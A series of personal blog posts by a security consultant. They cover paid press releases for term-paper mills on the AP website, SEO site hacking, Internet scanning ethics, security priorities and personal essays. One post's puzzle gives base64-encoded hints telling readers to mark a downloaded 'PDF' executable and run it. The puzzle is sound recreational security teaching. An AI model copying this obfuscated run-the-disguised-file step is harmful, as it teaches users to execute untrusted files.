In my last blog post, I outlined a relationship that exists between an organization called KISSPR and the Associated Press. It’s a cozy little venture in which KISSPR pays the Associated Press an undisclosed amount of money to have press releases placed on the AP website. Many of these press releases are thinly veiled advertisements for questionable products from questionable businesses masquerading as news. And the fine, upstanding products getting flogged through this relationship? Pre-written term papers, herpes treatments, hair-growth supplements, and psychic readings - just to name just a few.

How cozy is the relationship? KISSPR has their own directory within the AP’s Press Releases section on their site.

“Okay, fine…,” I hear you say, “If the AP wants to sell its soul and integrity, that’s their problem.”

Ah… but it isn’t just the Associated Press.

I decided to see just how much reach one of these stories had.

I randomly selected one of the recent “research paper writing service” press releases from the AP site. It had the title, “4 Best Research Paper Writing Services - Top USA Paper Writers Among 69 Tested - Review by Halvorson.”

From the body of the article, I chose a specific, likely-unique sentence (“The up-scale quality of writing services;”) and tossed it into Google - locking down my search to return only those results with “research paper” in the title. I also removed Google’s default filtering of duplicate results:

Click here to see the results.

Here’s a list of sites that picked up this content:

apnews.com (obviously...)
yahoo.com
globenewswire.com
ktvn.com
wboc.com
wrcbtv.com
kake.com
menafn.com
digitaljournal.com
unitedkindgomnews.net
denvernews.net
siliconvalleynews.net
oklahomacitynews.net
caymanmama.com

And, pray tell, what was the amazing content of this article - content that was picked up by so many news organizations?

It lists 4 recommended sites, giving coupon codes for two of them (oddly, the SAME coupon code works on both of them despite the fact that they are, no doubt, totally independent sites…). Nowhere in this fascinating piece of investigative journalism do they list the 69 sites they compared and (with the exception of the headline) they don’t even mention comparing 69 sites.

Please go back and look at my previous post because I’m about to say, “I told you so…” and I really, REALLY want you to SEE what I told you…

The second sentence of the review for the top research paper writing service says this: “You could see such trustworthy resources as Associated Press talk about this company as a reliable website to get a high-quality paper.”

And there you have it. The first death-rattle of the reputation of the Associated Press.

The Associated Press, with 170 years of commitment to the highest standards of objective, accurate journalism, being used to legitimize a skeevy purveyor of plagiarism.

(Note: “You could see such trustworthy resources as Associated Press talk about this company as a reliable website to get a high-quality paper.” Holy crap, that’s TERRIBLE writing. Seriously, it’s bad. I wonder where KISSPR could find someone to help them with their writing?)

Interestingly, the words “Associated Press” in that quote linked to another paid press release on the Associated Press website. This one is attributed as “Paid content from Prodigy News” and actually lands outside of the Press Releases section of the site. You know… out in the section supposedly used for… well… news.

Who is Prodigy News? I really couldn’t find much information on them (honestly, I wasn’t motivated to look very hard…) but in the strangest of coincidences, they use essentially the same wording for the “Content Disclaimer” at the end of their press releases as KISSPR (including the grammatically incorrect “website’s”):

Content Disclaimer: The information does not constitute advice or an offer
to buy. Any purchase made from the above press release is made at your own 
risk. Consult an expert advisor/health professional before any such purchase. 
Any purchase made from this link is subject to the final terms and conditions 
of the website’s selling as mentioned in the above as source. The content 
publisher and its downstream distribution partners do not take any 
responsibility directly or indirectly. If you have any complaints or 
copyright issues related to this article, kindly contact the company this 
news is about. 

Finally, who the heck is this “Halvorson” who is doing all of this fantastic in-depth research on paper writing services for the KISSPR piece? Who took on the mind-numbing task of reviewing 69 research paper writing services, yet failed to find one more to make it a round 70? Who is the word-smith who fashioned the sentence, “You could see such trustworthy resources as Associated Press talk about this company as a reliable website to get a high-quality paper.”

This is a true renaissance person - an author for the ages…

Halvorson: Women want to be with him, men want to be him.

But I digress…

Scrolling down to the bottom of the article, we find the following:

Company: Halvorson LLC
Address: 3694 Westwood Avenue, NY, 11563
Phone: +12025550177

I did a little digging. There is no Halvorson, LLC listed in New York state’s business registry. There is no 3694 Westwood Avenue in the 11563 zip code, or anywhere else in the state of New York (or in the entire U.S. as far as I can tell…) and best of all, +12025550177 is a totally bogus number (202 is the area code for Washington, DC, but the 555 prefix is the central office code in the North American Numbering Plan and is often used for fictitious phone numbers.)

Oh… and the phone number used by the source for that other, Prodigy News, press release? +12025550177

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 31, 2021

NOTE: I purposefully did NOT directly link to any of these press releases. Not just because I’m philosophically against giving further credence to the term paper peddlers. If I’m gonna to link to them, I’m gettin’ paid… :-)

Act I - A pistol hangs on the wall…

There is a quote, attributed to the great playwright Anton Chekhov: “If, in the first act, you have hung a pistol on the wall, then in the following one it should be fired. Otherwise don’t put it there.”

The following quote is my pistol, and by the end of this post, it’s going to get fired.

"Hypocrites get offended by the truth" - Jess C. Scott

It all began nearly five years ago. I was doing some early-morning Google searches, looking for compromised sites. That’s when I first discovered them: The Term Paper SEO Hackers. I’m sure that they had been around for a while, but I just hadn’t noticed them. I had been concentrating more on the folks who whacked sites to boost the search engine standing of their boner pill outlets. That day, what caught my eye was the utter brazenness of The Term Paper SEO Hacker’s actions - these clowns had hacked the U.S. Capitol’s website.

Thus began an interesting little tête-à-tête between the fine, upstanding purveyors of pre-written term/research papers (sold to so-called students with more money than morals) and me.

Somehow, these irreproachable entrepreneurs (whose business model is based on feeding college plagiarist’s desire to cheat their way to better grades) ended up getting SEO links to their web storefronts placed on compromised sites all over the Internet.

No one knows how it happens (or so they claim…), it just does.

The term paper vendor in that first encounter was an outfit called SpeedyPaper - but they aren’t the only game in town. Far from it. The market for pre-written term/research papers appears to be very competitive. A rather large assortment of vendors seems to be fighting tooth-and-claw, each seeking to gain some advantage over their peers, sometimes using very unscrupulous tactics.

Somehow - magically - websites are hacked.

Hundreds of links pointing back to their storefronts simply appear so that search engines become optimized.

It’s all dark and mysterious.

The prevailing wisdom (as espoused by SpeedyPaper) was that this process involves Eeeeevil Competitors^™ attempting to make them look bad.

(Note 1: Eeeeevil Competitors^™ are like that. Always going around, hacking sites to boost your search engine placement and thus make you look bad. Damn those Eeeeevil Competitors^™!)

(Note 2: I’ve been known to entertain the notion that web hackin’ freelancers were somehow convinced that they might be paid to hack sites and deliver click-throughs as part of some twisted affiliate program, complete with referrer tokens. But hey… what do I know…? Those odd web request parameters being sent to SpeedyPaper’s site were probably totally innocent.)

My role in this ongoing spectacle has been to notify the folks playing the part of the Poor Unsuspecting Victim^™ and try to get their sites cleaned up.

It was a role that I was happy to play.

Until yesterday.

Act II - The pistol fires…

Yesterday, while trolling for hacked sites, I happened to throw a few term/research paper-related words into the mix for old-time’s sake. I scrolled through a few pages of results and then my eye lighted on something that, literally, made me gasp. There was a result from apnews.com, the Associated Press.

“Oh hell no…,” I thought, “They didn’t hack the Associated Press…”

No.

No, they didn’t.

The truth was worse.

Much worse.

It turns out that the Associated Press has a portion of it’s website where, for a fee, organizations can have press releases posted. And there, in the middle of the press releases section, suffused with an aura of respectability provided by the Associated Press was an article titled, “6 Best Essay Writing Services Available Online - AP News”

Now, it’s important to note that there is a disclaimer placed on these press releases: “Press release content from $ORGANIZATION. The AP news staff was not involved in its creation.” It’s important to note that because, obviously, having a disclaimer makes it all better.

Or not…

Actually, it gets even worse.

First though, let’s summarize: There are organizations who exist to provide pre-written term/research papers and essays. A review of the websites of these companies finds that they’re all pretty similar - they tend to be chock full of verbiage designed to reinforce the idea that needing to purchase a pre-written paper is all someone else’s fault. You have too many assignments, you poor overworked college student. No one could keep up. It isn’t plagiarism, it’s time-management. They all tend to have breathless testimonials, glowingly describing their wonderful customer service. They even have incentives for planning your plagiarism - they steeply jack up their prices should you need your paper at the last minute. The message: being organized about your cheating saves you money.

They all have one other thing in common: every site claims that their papers will not be caught by the plagiarism detection software/services used by universities.

So, inherently, they’re all saying this: Yes, you’re cheating. But we’ll make sure you don’t get caught.

Let’s make no mistake about this: it absolutely is cheating. Every university has some kind of code of conduct or ethics that specifically states: engaging in plagiarism is cheating.

To me, organizations that make their money aiding and abetting academic dishonesty by encouraging plagiarism are a pretty skeevy lot.

But those organizations (and a bunch of other semi-shady outfits) have found a way to rehabilitate their images: paying a few bucks to get links and mentions on the website of the Associated Press. Hmmm… this proposition seems so oddly… familiar. You pay some money to get something you don’t deserve. Now where would I have heard of something like that before?

Remember when I said it was worse?

Please, if you would, follow this link to a Google search showing an amazing list of press releases on the AP site. (Note: I’m not going to directly link to any of them. I don’t want to give them any more undeserved traction than they’ve already purchased…)

These are press releases providing “reviews” and “lists of top facts” about essay writing websites. These amount to recommendations for the best way to commit academic misconduct - and there are literally hundreds of these press releases being legitimized by the Associated Press.

The. Associated. Press.

The Associated Press, winner of 54 Pulitzer Prizes.

The Associated Press, whose website states, “For 170 years, we have been breaking news and covering the world’s biggest stories, always committed to the highest standards of objective, accurate journalism.”

The Associated Press, in whose own “Statement of News Values and Principles” - right on the first damned page - says “We don’t plagiarize, and we respect copyright.”

The Associated Press, has become a shill for skeevy purveyors of plagiarism.

And it doesn’t just end with term papers. Apparently, the AP is partnering with a questionable public relations firm called KISSPR. The AP’s press releases section on their website has an entire directory specifically dedicated to press release content from KISSPR. It’s all so very, very cozy.

Those term paper “reviews” are a product of that KISSPR relationship. As are “reviews” of a herpes treatment, hair growth supplements, and other equally questionable products.

Many of these press releases are thinly veiled advertisements for questionable products from questionable businesses masquerading as news. All of this is being legitimized on the back of the reputation of the Associated Press. You can bet that once these press releases hit the AP site, they’re being referenced and re-referenced with some sort of phrasing like “As reviewed on the Associated Press website,” or “As reported on the Associated Press website.”

Personally, I’m disgusted.

I’m disgusted by the term paper sellers.

I’m disgusted by the business model of a company like KISSPR - To me, they’re just professional appliers of porcine lipstick.

I’m disgusted - most of all - by the Associated Press.

But, in the end, I can only be disgusted. No laws are being broken here. The Associated Press is choosing to sell its soul for the filthy lucre being tossed their way by KISSPR. KISSPR is charging their clients even more to facilitate the placement of these press releases. Everybody wins… except journalistic ethics and integrity.

Remember when the ethics and integrity of the people we trusted to report the news actually meant something? Remember when truth used to matter? Now, all of that ethical crap is tossed aside - a relic of a bygone era - because padding the bottom line is much more important than journalistic integrity.

What does a news organization become when it abandons ethics and integrity? What happens when reporting accurately and honestly takes a back seat to an income stream generated by publishing anything some PR flack decides to throw in front of you?

What happened to the truth?

Finally, if you want to do a little looking, you might find that some of these “reviews” have made their way out from under the press releases portion of the AP site and are listed as news articles. They’re still tagged with the “Paid Content” disclaimer, which - to me - somehow makes the whole thing even sadder. I happened to find one article that recommended my favorite recipient of website hacking miracles, SpeedyPaper, and I threw up in my mouth just a little bit. I’ll leave it as an exercise for the reader to find more egregious examples, because the whole sordid mess has me feeling just a little bit tired and dejected.

In the end, I have just two things to say to the Associated Press:

• Trust is the most valuable, hard-earned commodity any of us can possess. I hope that you were paid handsomely for yours…

• Are you feeling offended?

Bang!

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 28, 2021

There are several companies who “scan the Internet” and provide the resulting data to paying customers. These scans can be a bit invasive. When do you think such scanning crosses a line?

The results were as follows:

10% - All scanning = bad
 0% - Service enumeration = bad
45% - Account enumeration = bad
45% - Scan away! No problem!

I find these results to be interesting for several reasons. Most obviously, there is a very big split in how security folks think about scanning. There is a minority who come from what I’ll call the Old School perspective: thinking that ANY scanning is bad. (Note: I absolutely do not mean Old School in any sort of pejorative way - as will become clear momentarily…) The remainder of folks are split evenly between those holding the line at account enumeration and the whole laissez faire, go-ahead-and-scan-whatever-you-want point of view. No one chose to stop things at service enumeration - which I find a little surprising. I guess if you think a port scan is allowable, then poking around to find out exactly what service is behind an open port is fine as well.

As for my own, personal opinion… well… that’s going to take a bit of explaining.

For the networks that I run, my answer is:

Best of luck to you.

But remember, we’re talking about scanning the entire Internet, and that’s a whole different kettle of fish.

Unless and until I am placed in charge of the entire Internet - in order to fulfill the words of the ancient prophecy^* - the bulk of what goes on out there is borderline kindergarten chaos. Few, if any, netblocks offer the kind of funhouse scanning journey that I can provide. We need to think about the children.

Here’s the thing (remember when I told you Old School folk to hang on for a bit?): In my opinion, scanning is wrong.

I know I’m going to get all kinds of flack about this (note: since I already admitted that, you really don’t need to send it…) but I’m Old School too. You don’t have any business messing with someone else’s stuff unless they invite you.

This is one of those things we teach our kids when they’re little - you never walk into someone’s house or room without being invited. It’s just not polite. You don’t plop down at a co-worker’s desk and start using their computer without asking. It’s just not polite.

In polite society, we ask permission before we use someone’s stuff.

Sometimes, there’s a widely accepted ongoing invitation, and that’s fine. Most houses have a sidewalk leading up to a front door, and a doorbell. Unless there’s a sign telling you not to, it’s totally permissible to walk up that sidewalk and ring that bell. I kinda think of websites behaving like this… they’re the sidewalks and doorbells of the Internet. If you’re going to get bent about someone connecting up to 80/TCP, then firewall that sucker off. Also, you need anger management.

But in polite society, we don’t go beyond the sidewalks and doorbells. We don’t go peeking through windows and rattling doors. And that’s why I don’t like this new trend.

Having these SaaSsy scanning folks attempting to legitimize port scans, service enumeration, and worse just muddies the waters for those of us trying to actually monitor our networks for real attacks. Over the past several months, I’ve been Tweeting out every new scan I’ve seen where someone is claiming legitimacy. It’s starting to get a little ridiculous. How am I supposed to see threats when the threats have become a business model?

My buddy Johannes Ullrich reminded me that the SANS Internet Storm Center has a feed of research-related IP space - ranges of IP addresses that claim that their scanning is legitimate. It can be grabbed in two flavors: straight up XML or JSON. While I applaud the effort, it just isn’t enough. Because of the thrashing in the industry, this list is never going to be comprehensive (in fact, Johannes updated the list from a netblock found in one of my tweets). And the paranoid security dude living deep inside me wonders what the hell are they doing with this research?

Of course the SaaSsy scanning folks will say, “But you can opt-out… Tell us you don’t want us to scan your netblock and we won’t. See how virtuous we are?”

I’m convinced that they do this stuff just to get me all riled up.

I shouldn’t have to opt-out. To return to the polite society metaphor, I don’t need to opt out of having someone poke around my property without my permission, and anyone who does go beyond the boundaries placed by polite society is automatically suspect. If I find you wandering around in my garage without my permission, you’re going to have some serious ‘splainin’ to do - to me and, likely, to the police. So why is it okay for someone to build a business that is modeled around the wholesale violation of the boundaries of polite society?

Sorry, you SaaSsy scanners - while what you do may (in some jurisdictions) be legal, as far as I’m concerned, that doesn’t make it right. Just saying you’re TOTES LEGIT doesn’t make it true.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 24, 2021

^*This is one of my favorite phrases to throw into conversation. I feel it lends an air of gravitas to even the most mundane activity. "Yes dear, I took out the garbage like you asked, in order to fulfill the words of the ancient prophecy."

I pretty much think that my wife deserves sainthood.

Unfortunately, 2021 has started off in an unprecedented manner as well. Solar Winds, Microsoft Exchange, Big-IP to name but a few of the unprecedented things that we’ve been dealing with since the ball dropped on New Years Eve.

Now is not the time for people who aren’t serious about their work to be involved in IT and especially IT Security.

That’s why this story bothers me so much.

First of all, let’s get this straight: I’m deliberately not naming names in this story because I don’t want to out anyone - I’m a hell of a nice guy that way. Not that they don’t deserve to be outed - they do. But I was young and stupid once too - we all were, so I’m somewhat apt to give that combination a pass.

Also, and this is important, I’m working off of a very limited view of the individuals involved. I don’t know them, I don’t know their mindset or their struggles - I only know what I can interpret from their social media posts - something that, I’ll admit, is likely to paint a horribly inaccurate portrait.

But, while this certainly may not be an accurate portrait of this unnamed individual, I do believe that it accurately portrays something about our industry in general - and that’s why I’m telling this story.

So, let’s start at the beginning…

Hi, my name is Tom, and I have a knack for finding compromised systems on the Internet. I find them, and then I try to contact the system owners (as opposed to 0wners) to get them fixed. Hey… it’s a hobby.

Generally speaking, I have two main tools that I use find compromised systems:

• I run a bunch of different types of honeypot systems
• I do a lot of Google searches

This story starts with the latter.

Using some Google search-fu, I found a website that had been 0wned by purveyors of boner pills. Unless you’re new to the Internet, this shouldn’t be surprising. Folks selling all manner of borderline-illicit things whack websites left and right on the ‘Net, placing links from the compromised sites pointing back to their own storefronts. The idea is to boost their site’s rankings in search engine results - a process known as Search Engine Optimization (SEO) Hacking. (Lest I get a slew of emails again, I am compelled to state that there are legitimate SEO practices that can be used to boost a site’s search engine ranking. These do not, however, involve hacking other sites. Just sayin’…)

The more popular and more legit a site is, the better target it represents for SEO hacking. If you’re trying to boost your site toward the top of the search engine rankings, you want it to have links from popular and legitimate sites. And lots of those links.

As best as I can tell, the site I found had been compromised for at least 7 months. It had, according to Google, about 21,800 "pages" linking to various boner pill storefronts. Please note that I put the word "pages" in quotes (<-- there, I did it again). That's because the compromised site was run on WordPress (the WebApp Hacker's BFF^™). As such, the whole concept of "pages" is a little vague... YourFlyIsOpen.com is a statically generated site and thus has an individual html file for each page. WordPress sites are dynamically generated and can just have a bunch of URLs listed in a database that point to a single chunk of crappy markup/HTML stored in that same database. When WordPress gets a request for one of those stored URLs, it just vomits out the associated HTML. Thus, the idea of "pages" becomes a little bit slippery...

All of that being said, this is pretty run-of-the-mill stuff on the ‘Net in 2021. I find sites like this all of the time and I do my very best to find someone to get them cleaned up. That’s where this one went a little off the rails.

I sent multiple emails.

I called and left voicemails.

Nothing.

Sometimes, for whatever reason, a specific site compromise bothers me. For most sites, I’m just fine to make an effort and then let it go if nothing happens. Every once in a while, I just can’t walk away. This was one of those.

I decided to do a little digging. Helpfully, the site had one of those Our Team sections that listed a bunch of their IT folks. That was what I used for firing off the emails and phone calls.

I decided to use some of those names to poke around a little bit on Twitter. I figured maybe I could use the Big Blue Bird to give someone a nudge to do something about their compromised site. On my third try, I had what looked like a hit.

I pulled up a list of their Tweets and plowed down through them in order to see if I could find any details that might verify that this was, indeed, a person associated with the compromised site.

That’s when I got aggravated.

A few months back, they had Tweeted triumphantly about the results of a phishing exercise that they had performed. They were absolutely gleeful about the fact that they had “gotten hits” from several members of the organization who would now need to perform remedial phishing training.

What. The. Hell.

Generally, I’m not one for tossing around Biblical quotes, but this one just seems so darned appropriate:

Thou hypocrite, first cast out the beam out of thine own eye; and then shalt thou see clearly to cast out the mote out of thy brother’s eye. - Matthew 7:5

As a practice, Security has a problem with beams, motes, and priorities.

For the past 20 years, it’s been my privilege to work with all manner of folks who are trying to do better - trying to up their game. These are serious folks, working in serious organizations, being serious about doing their best.

Unfortunately, there are still a ton of organizations out there that are content to just go along, doing what they’re doing, generally being unserious about their jobs. These folks (and thus their organizations) have priorities that are all askew.

Let me spell this out: If you’re an IT professional and you get an email from me, telling you about a system or site compromise, you likely aren’t being serious about your job. You need to check your priorities.

Put aside for a moment that your site got whacked… hell, people make mistakes, those things happen. The bothersome thing here is that someone else found out about it before you did. You can’t be monitoring your network to an appropriate level if someone else figures this stuff out before you.

Let’s try to get some priorities in order:

1. If your organization provides publicly available services (web, email, VPN, etc…) your first priority is to make sure that those are deployed securely.
2. Monitor your frickin’ logs. No, this isn’t as fun or as flashy as a pentest or a phishing exercise, but it’s your job and it’ll find your problems before someone else (like me!) does. Seriously, that’s your second priority.
3. Unless and until you’ve done the work of actually locking down your environment to the level of generally accepted best practices don’t even think about pentests. Professional pentesters will eat you alive.
4. Make sure you’ve gotten the beam out of your own eye before looking for the mote in someone else’s. Don’t even think about running a phishing exercise unless you’re checking your logs and you’re damned sure your website isn’t compromised.
5. Get yourself educated. Before you can educate your users (and you should be educating your users), you need to understand more about your job. Security is constantly evolving, if you’re not, you and your organization will be left behind.

A couple of bonus chunks of advice:

• Phishing exercise should never be gotcha games.
• What is there to be gleeful about when someone takes a phishing bait? That just means you failed to properly educate them.

Security 101 in a nutshell:

• Deploy your stuff securely
• Monitor your stuff to make sure it stays secure

Please note: Stuff wasn’t my first wording…

Priorities are important. Make sure you understand yours.

Now, if you’ll excuse me, I think I’ve got something in my eye.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 22, 2021

Postscript

Because I am - as stated earlier - a hell of a nice guy, I’m going to leave you with some tricks that you absolutely should be using to monitor your organization’s website. This isn’t a substitute for monitoring your logs, but it’s something you should be doing in addition to monitoring your logs.

• Do a Google search. Using Google’s site: keyword, anchor your search to only pages on your site.
  • site:yourwebsite.com
• Check out the number of results at the top of the first page. If this is your first time looking at your site, you may not have a clue how many pages your site has. Remember: There’s a good reason they say “About X results.” Use this number as a reference/order of magnitude only. But if this number changes dramatically the next time you do this, you need to figure out why.
• Look through all of the results and make sure there isn’t anything unexpected in there…
  • I never said this was going to be easy…
  • If your site has an inordinate number of pages, you can narrow things down a bit by adding some well chosen search terms. I generally throw in the word buy. Remember though, you could be missing things.
• For some additional fun, you can paste &as_qdr=y15 at the end of the Google search URL. That’ll tag each search result with the last time that Google noticed that the page was updated.

Seriously. GO DO THIS. Because if you don’t, I will…

There is a class of problems that I often refer to as laundry problems. This harkens back to my college days when I would put off doing my laundry for days and days. I would look at the large, overflowing bag of dirty clothes and be overwhelmed just looking at it.

“Oh man…,” I would think, “I need to haul that big dang bag to the laundromat, sort it, wash a bunch of separate loads, dry it, fold or hang it, and then haul it all back…”

It was pretty much over before it began.

“I just don’t have time…,” I would think, “I’ll do it on the weekend…”

And the laundry would continue to pile up.

At some point, that horrible day would arrive. I would open a drawer, or look in the closet, and realize that I was taking the very last shirt, or the very last pair of pants. (Note 1: Generally this came after re-wearing several articles of clothing. Having re-worn everything decent, you were down to that one shirt or pair of pants that you really didn’t like very much, but that you would rather wear than… well.. do laundry. Note2: Being incredibly self-aware when it came to my laundry-procrastination abilities, I would always be sure to have an overabundance of underwear… re-underwearing being a fate too horrible to ponder.)

And so, with no other alternatives, I would resign myself to fate: I would be spending that afternoon or evening doing laundry.

And you know what? Every time, when I was done, I would think the same thing:

“Well… that really wasn’t so bad.”

Lots of problems in life are laundry problems. We tend to make the obstacles or difficulties seem so big in our minds, we end up avoiding doing anything.

This website has been languishing on an old, outdated AWS instance for… well… about five years.

Every time I thought about fixing it, I came up with several dozen excuses for why now just wasn’t a practical time to take on that task.

No question: A laundry problem.

Last night, in a fit of pique (note: the result of me being irritated at myself, because I’ve injured my own pride by continuing to procrastinate) I dove in and tackled it.

Holy hell, I love AWS, ssh, and rsync because now I get to say, “Well… that really wasn’t so bad.”

It took me probably 45 minutes from start to finish. I was so frickin’ proud of myself, I even shifted the site over to HTTPS using a Let’s Encrypt certificate. That took a little longer, because there was some learnin’ involved, but that really wasn’t so bad either.

Hmmmm…

I should probably start working on my taxes…

I just don’t have time…

I’ll do it on the weekend…

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 18, 2021

Additionally, each of these gatherings - which have been dubbed “ListonCon” - have started with a group puzzle and ended with a Sooper Sekret Field Trip to somewhere interesting. We’ve had private tours of Yerkes Observatory and FermiLab. We’ve even spent a little time at one of the world’s largest video arcades, the Galloping Ghost Arcade.

Last February, we (Don “Cutaway” Weber, Suzanne Pereira and I - they’re my faithful co-organizers of these events) were talking about possible dates for the summer when we began hearing rumblings about a strange virus outbreak in China. Everyone on earth knows how that turned out… So, while an in-person event was off the table, we pivoted to creating a virtual event instead. To keep the Sooper Sekret Field Trip tradition alive, I decided that I needed to create a Virtual Sooper Sekret Field Trip.

At the same time, I had been thinking about a way to drive a stake through the heart of the MD5 hash - something that is still widely used by lots of folks who should really know better.

Thus, the fictional land of Skodovia was born (it was a rework / extension of a challenge I put together for the SANS Mini Netwars - Mission 1). I originally created and distributed this for the folks who attended the 2020 Virtual ListonCon, but I’m going to just leave it here and not say too much more about it except for these three things:

• It’s pretty Linux-centric. I apologize to the Windows folks amongst you. Microsoft should, but won’t.
• The PDF file opens nicely in both Chrome and Okular. If you’re having trouble, try one of those…
• Sometimes things turn out to be a little more involved than they may seem at first.

Need a hint?

echo 'VHJ5IHRoZSBMaW51eCAnZmlsZScgY29tbWFuZC4K' | base64 -d

Need an additional hint?

echo 'TWFrZSB0aGUgUERGIGV4ZWN1dGFibGUgKGNobW9kICt4IFZpc2l0U2tvZG92aWEucGRmKS4gUnVuIGl0Lgo=' | base64 -d

Visit Skodovia: Come for the people, stay for the wombats.

Download our Informative Brochure

Note: It is absolutely critical that you confirm that the MD5sum of the brochure file is 650c537172de7e559b686100aa3a1c06 before you open it.

You also might want to keep a backup. Just sayin'...

We have a fenced in area around our pool. When the temperature falls and small critters start looking for a place to hunker down before the snow flies, sometimes they land inside our fence.

It’s a pretty awesome place for them to winter over. Lots of plants and bushes for cover. And then there’s the fence: bars spaced wide enough for small critters to pass through but narrow enough to keep the coyotes out.

Every few winters, the rabbits move in…

The problem with the rabbits is twofold: they tend to eat plants and then they… well… they poop.

A pair of rabbits produces an amazing amount of poop.

This past weekend, my grandsons were over visiting. My wife and I were working outside by the pool, doing some early spring cleanup and the kids were running around, being… well… kids.

Out of the blue, my youngest grandson came running up to my wife and held out his hand to show her something.

“Look, Grandma,” he proudly declared, “I found a bunch of cool little round pebbles…!”

We have a problem in the security industry. (To be fair, it’s a problem with the whole technology sector in general, although the security industry probably represents the worst of the worst.)

If it’s shiny, if it’s new, if it’s tagged with any of the buzzword techno-concepts du jour - we want it. Currently, if you slap “machine learning,” “AI,” or “blockchain” onto any old-school tech, you’ll likely have to swat away the customers like flies - whether using those technologies makes sense or not.

That’s why I’m particularly proud of the work that I do with Counter Hack. We do our best to integrate buzzword tech into the challenges that we create - so folks have an opportunity to work with those technologies and a gain hands-on understanding of what they’re really all about. As an example, for the SANS 2020 Holiday Hack Challenge I worked with my elf pal Qwerty Petabyte (who teaches at Elf University at the North Pole) to put together a blockchain challenge.

We get a lot of feedback from the folks who play Holiday Hack. While I absolutely love hearing people tell us about how they use Holiday Hack to introduce their kids or their spouse to the technologies they work with in their day jobs, there’s one type of email that really makes me smile. It makes me incredible happy when someone says, “I’ve heard so much hype about blockchain but I never really knew what it was about. Now I actually understand how it works.”

Knowledge - especially knowledge gained through spending hands-on time with a technology - is the best antidote our industry has to this problem. Otherwise, we’ll just keep flouncing along after the newest and shiniest gewgaw the vendors churn out.

Because, in many ways, we’re like children following the Pied Piper - listening to the music being played - just wanting to get our hands on the newest, coolest things we see.

But sometimes, those cool little round pebbles you find, will just turn out to be rabbit poop…

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
March 15, 2020

Note: I’m rapidly approaching the day which marks me having taken yet another trip around the sun - and that got me thinking. This blog post is the result.

This was one of the more difficult posts to write, because it’s very personal. We all have our own personal hells built from fear and anxiety - and this one is mine.

One of the most important things I’ve learned over the years is this: never judge another person’s fears. It’s all too easy to do, and it’s just wrong and incredibly unkind.

We somehow manage to find so many things in this world to divide humanity into “us” and “them.” But we’re all afraid of something…

Seeing him that way hurt.

It was the contrast. The last time I’d seen him had been so different. Then, he was himself. Not anymore.

My Grandpa was sitting up in a hospital bed, and for most of my visit with him, he had a distant look in his eyes. When you see that look, you know: he’s not really there. His mind has wandered away.

It might come back in a moment, in an hour, in a day - it might not. Over the course of the time I was there, his mind wandered back a few times - but for the most part, it was away.

There were tantalizing moments where clarity seemed so close. He would sometimes talk about normal things - he would walk along that border between reality and whatever it is that lies beyond. Thinking back, those moments were probably more my wishful thinking than anything else.

Then, there were the bugs.

He was at war with imaginary bugs. They were a constant nemesis. Crawling out of his ears, out of the IV in his arm, out of the pillow. He rarely sat still - because the bugs wouldn’t let him.

He needed to smash them between a leathery finger and thumb.

He needed to scratch them away.

There were lots of marks on his face, bloody scratches by his ears - the war wounds of his battle with the bugs.

Seeing him that way hurt.

And it was terrifying…

This is my biggest fear.

I’m getting older - all of us are. But for me, each passing year makes my fear grow bigger and bigger.

I don’t want to end up like him.

There. I said it, wrote it… whatever.

For my entire adult life, I’ve made my living off of the three pounds of stuff between my ears. The thought that it may, ultimately, betray me is what terrifies me - what keeps me awake at night. My biggest fear.

With each new trip around the sun, I find myself wondering more and more, “when,” not “if,” and - trust me - that’s a bad transition to make.

I watch myself. I feign scientific detachment, but in reality, every slip, every forgotten word, every misremembered name, every pause as I try to pick up a lost thread in a conversation frightens me.

I know I’m somewhat obsessing. I know that this fear of mine is making me hyper-aware. It’s making me see problems where - for the most part - none exist. But still, I watch myself.

If I’m objective, I can look at this past year and see that I’m still on my game. I accomplished a lot. I learned. I created new, and amazing things (if I do say so myself…). But that’s the thing about fears. Fears defy objectivity.

Accomplishing, learning and creating, are just a way of saying to life, I’m still here. It’s why we do everything. As we wander on our path, at every turn, we want to be able to shout at the universe, “I’m still here.”

And I suppose, when I think about it from that perspective, my greatest fear is to still be here, but not be able to shout about it.

Even writing those words is terrifying.

So, what is the point of all of this? Why am I talking about my greatest fear?

Because I’m not alone. This isn’t one of those us and them concepts. You have fears of your own and whether you want to admit it or not, your fears - different though they may be - have you tied up in just the same kind of knots. We all do. It’s part of being human.

What to do? What to do?

There’s all sorts of inspirational quotes that you can find that talk about conquering or overcoming your fears. They all seem a little dangerously cliché to me.

So here’s my advice: Leave your fears alone. Don’t try to conquer them. Don’t overcome them. Because I’m pretty sure that whoever is selling that particular brand of Hallmark-card crap has never actually lived it. It’s a faux-inspirational wrapper around judging someone else’s fears, translating the words your fears aren’t valid, get over it into some pithy saying on a motivational poster.

I don’t know about you, but my fears are valid. Conquering or overcoming them isn’t going to happen.

Want some more advice? Acknowledge your fears for what they are - a potential future that you don’t want. Use those fears to lower the probability of that future happening and then do your very best to ignore them.

Seriously. Ignore them.

You’re not going to be perfect about it - Lord knows I’m not. But the day that I decided to stop trying to overcome my fears, the day I acknowledged that what I was afraid of was just a potential future that I didn’t like, I gained a whole lot of perspective. I stopped beating myself up for not conquering my fear.

Do I still worry?

Hell yes.

I’m worrying about a potential future. I don’t need to overcome that - it’s a perfectly reasonable thing to do.

I worry a bit about that potential future, and then I refocus myself on that very special word: potential.

What I worry about may happen. It may not. I’ll do what I can to control the probabilities around that potential, but then I’m done. I’ll ignore it as best as I can, and move on.

Divorced from the damaging idea that fears are to be conquered or overcome, those fears become guidelines for making choices about the direction of your life. I’ll do what I can to make that future be what I want. Beyond that, I’m not in control.

Now this isn’t to say that fears and anxiety can’t become a problem. They absolutely can. Fears and anxiety can become crippling - and if you’re at that point in your life, please seek professional help.

